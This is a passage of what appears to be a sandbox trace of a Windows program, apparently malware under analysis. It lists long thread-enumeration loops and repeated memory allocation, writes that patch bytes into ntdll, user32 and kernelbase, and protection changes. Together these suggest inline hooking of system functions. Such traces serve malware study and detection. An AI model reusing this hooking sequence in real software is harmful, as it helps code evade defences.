[0049.750] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.750] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.751] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.751] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.751] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.751] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.752] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.752] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.752] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.752] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.753] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.753] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.753] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.753] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.754] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.754] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.754] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.755] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.755] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.755] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.755] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.756] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.756] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.756] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.756] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.757] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.757] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.757] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.758] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.758] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.758] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.758] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.759] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.759] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.759] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.760] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.760] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.760] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.760] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.761] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.761] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.761] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.761] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.762] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.762] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.762] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.763] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.763] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.763] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.763] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.764] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.764] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.765] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.765] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.765] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.765] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.766] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.766] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.766] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.767] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.767] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.767] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.767] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.768] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.768] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.768] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.769] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.769] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.769] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.769] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.770] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.770] Thread32Next (hSnapshot=0xbc, lpte=0x18f844) returned 1 [0049.816] CloseHandle (hObject=0xbc) returned 1 [0049.817] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x250c90 [0049.817] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xa) returned 0x250ca8 [0049.818] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0049.818] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x250cc0 [0049.818] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x12) returned 0x250cd8 [0049.820] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x250cf8 [0049.820] GetSystemInfo (in: lpSystemInfo=0x18f348 | out: lpSystemInfo=0x18f348*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0049.820] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x220000 [0049.820] GetCurrentProcess () returned 0xffffffff [0049.820] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x220005, lpBuffer=0x18f32c*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f32c*, lpNumberOfBytesWritten=0x0) returned 1 [0049.822] GetCurrentProcess () returned 0xffffffff [0049.822] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x22000f, lpBuffer=0x18f330*, nSize=0x6, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f330*, lpNumberOfBytesWritten=0x0) returned 1 [0049.823] GetCurrentProcess () returned 0xffffffff [0049.823] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x77c81f2d, lpBuffer=0x18f32c*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f32c*, lpNumberOfBytesWritten=0x0) returned 1 [0049.824] VirtualProtect (in: lpAddress=0x220000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x18f36c | out: lpflOldProtect=0x18f36c*=0x40) returned 1 [0049.825] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x4) returned 0x250d10 [0049.826] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x250d20 [0049.826] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x12) returned 0x250d38 [0049.828] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x250d58 [0049.828] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x240000 [0049.829] GetCurrentProcess () returned 0xffffffff [0049.829] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x240008, lpBuffer=0x18f32c*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f32c*, lpNumberOfBytesWritten=0x0) returned 1 [0049.831] GetCurrentProcess () returned 0xffffffff [0049.831] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x240015, lpBuffer=0x18f330*, nSize=0x6, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f330*, lpNumberOfBytesWritten=0x0) returned 1 [0049.835] GetCurrentProcess () returned 0xffffffff [0049.835] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x77c81f10, lpBuffer=0x18f32c*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f32c*, lpNumberOfBytesWritten=0x0) returned 1 [0049.835] VirtualProtect (in: lpAddress=0x240000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x18f36c | out: lpflOldProtect=0x18f36c*=0x40) returned 1 [0049.836] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x8) returned 0x250d70 [0049.836] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x250d10 | out: hHeap=0x250000) returned 1 [0049.837] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x250d80 [0049.837] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xb) returned 0x250d98 [0049.837] GetModuleHandleA (lpModuleName="user32.dll") returned 0x77130000 [0049.837] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x250db0 [0049.837] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x250dc8 [0049.839] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x250de0 [0049.839] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x260000 [0049.839] GetCurrentProcess () returned 0xffffffff [0049.839] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x260005, lpBuffer=0x18f32c*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f32c*, lpNumberOfBytesWritten=0x0) returned 1 [0049.843] GetCurrentProcess () returned 0xffffffff [0049.843] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x26000f, lpBuffer=0x18f330*, nSize=0x6, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f330*, lpNumberOfBytesWritten=0x0) returned 1 [0049.848] GetCurrentProcess () returned 0xffffffff [0049.848] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7714db21, lpBuffer=0x18f32c*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f32c*, lpNumberOfBytesWritten=0x0) returned 1 [0049.848] VirtualProtect (in: lpAddress=0x260000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x18f36c | out: lpflOldProtect=0x18f36c*=0x40) returned 1 [0049.851] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x250df8 [0049.851] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x250d70 | out: hHeap=0x250000) returned 1 [0049.851] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x250e10 [0049.852] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x250e28 [0049.852] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x250e40 [0049.853] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x280000 [0049.853] GetCurrentProcess () returned 0xffffffff [0049.853] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x280005, lpBuffer=0x18f32c*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f32c*, lpNumberOfBytesWritten=0x0) returned 1 [0049.857] GetCurrentProcess () returned 0xffffffff [0049.857] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x28000f, lpBuffer=0x18f330*, nSize=0x6, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f330*, lpNumberOfBytesWritten=0x0) returned 1 [0049.882] GetCurrentProcess () returned 0xffffffff [0049.882] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x77148eb9, lpBuffer=0x18f32c*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f32c*, lpNumberOfBytesWritten=0x0) returned 1 [0049.883] VirtualProtect (in: lpAddress=0x280000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x18f36c | out: lpflOldProtect=0x18f36c*=0x40) returned 1 [0049.888] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc) returned 0x25d200 [0049.888] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xf) returned 0x25d218 [0049.888] GetModuleHandleA (lpModuleName="kernelbase.dll") returned 0x76c10000 [0049.891] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x25d230 [0049.891] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x290000 [0049.891] GetCurrentProcess () returned 0xffffffff [0049.891] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x290005, lpBuffer=0x18f32c*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f32c*, lpNumberOfBytesWritten=0x0) returned 1 [0049.895] GetCurrentProcess () returned 0xffffffff [0049.895] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x29000f, lpBuffer=0x18f330*, nSize=0x6, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f330*, lpNumberOfBytesWritten=0x0) returned 1 [0049.899] GetCurrentProcess () returned 0xffffffff [0049.899] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x76c23bbb, lpBuffer=0x18f32c*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f32c*, lpNumberOfBytesWritten=0x0) returned 1 [0049.899] VirtualProtect (in: lpAddress=0x290000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x18f36c | out: lpflOldProtect=0x18f36c*=0x40) returned 1 [0049.903] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x20) returned 0x250e58 [0049.903] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x250df8 | out: hHeap=0x250000) returned 1 [0049.905] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x25d248 [0049.905] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2a0000 [0049.906] GetCurrentProcess () returned 0xffffffff [0049.906] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x2a0005, lpBuffer=0x18f32c*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f32c*, lpNumberOfBytesWritten=0x0) returned 1 [0049.908] GetCurrentProcess () returned 0xffffffff [0049.908] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x2a000f, lpBuffer=0x18f330*, nSize=0x6, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f330*, lpNumberOfBytesWritten=0x0) returned 1 [0049.913] GetCurrentProcess () returned 0xffffffff [0049.913] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x76c23c28, lpBuffer=0x18f32c*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f32c*, lpNumberOfBytesWritten=0x0) returned 1 [0049.913] VirtualProtect (in: lpAddress=0x2a0000, dwSize=0x1000, flNewProtect=0x20, lpflOldProtect=0x18f36c | out: lpflOldProtect=0x18f36c*=0x40) returned 1 [0049.917] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0xbc [0049.919] Thread32First (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.920] GetCurrentProcessId () returned 0xaec [0049.920] GetCurrentThreadId () returned 0xae0 [0049.920] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.921] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.921] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.921] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.921] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.922] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.922] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.922] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.922] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.923] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.923] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.923] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.924] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.924] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.924] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.924] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.925] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.925] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.925] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.925] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.926] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.926] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.926] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.926] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.927] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.927] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.927] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.927] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.928] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.928] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.928] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.928] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.929] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.929] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.929] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.929] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.930] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.930] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.930] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.930] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.931] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.931] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.931] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.931] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.932] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.932] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.932] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.933] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.933] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.933] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.933] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.934] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.934] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.934] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.934] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.935] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.935] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.935] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.935] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.936] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.936] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.936] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.936] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.937] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.937] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.937] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.937] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.938] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.938] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.938] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.938] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.939] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.939] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.939] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.939] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.940] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.940] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.940] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.941] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.941] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.941] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.941] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.942] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.942] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.942] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.942] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.943] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.943] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.943] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.943] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.944] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.944] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.944] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.944] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.945] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.945] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.945] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.945] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.946] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.946] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.946] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.946] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.947] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.947] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.947] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.947] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.948] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.948] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.948] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.949] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.949] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.949] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.949] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.950] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.950] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.950] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.950] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.951] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.951] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.952] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.952] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.952] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.953] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.953] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.953] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.953] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.954] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.954] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.954] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.954] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.955] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.955] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.955] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.956] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.956] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.956] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.956] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.957] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.957] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.957] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.957] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.958] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.958] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.958] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.958] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.959] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.959] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.959] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.959] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.960] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.960] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.960] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.960] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.961] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.961] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.961] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.961] Thread32Next (hSnapshot=0xbc, lpte=0x18f83c) returned 1 [0049.962] Thread32Next (hSnapshot=0xbc, 